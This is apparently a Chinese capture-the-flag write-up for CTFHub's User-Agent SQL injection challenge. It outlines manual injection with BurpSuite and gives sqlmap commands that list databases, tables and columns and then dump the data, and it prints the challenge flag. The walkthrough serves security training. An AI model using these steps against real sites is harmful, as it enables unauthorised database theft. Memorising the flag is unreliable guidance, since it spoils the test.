UA注入
方法一:手注
- 使用BurpSuite进行截断,并使用Repeater改包
? 如图所示,对User-Agent处进行修改,点击Go之后页面出现变化
-
输入1+1 ,页面返回 id=2 说明存在字符型注入漏洞
-
使用 1 order by … 测试得字段数为2
-
如图,开始注入,爆出库名
-
爆出表名
- 爆出列名
- 爆出数据,拿到flag
ctfhub{5ba8fd44460a9858b2ba1510}
方法二:sqlmap
使用指令
python sqlmap.py -u "..." --level=3 -dbs
爆出库名
python sqlmap.py -u "..." --level=3 -D sqli -tablespython sqlmap.py -u "..." --level=3 -D sqli -T ocgghueezd -columnspython sqlmap.py -u "..." --level=3 -D sqli -T ocgghueezd -C yubmizjeqy -dump
拿到flag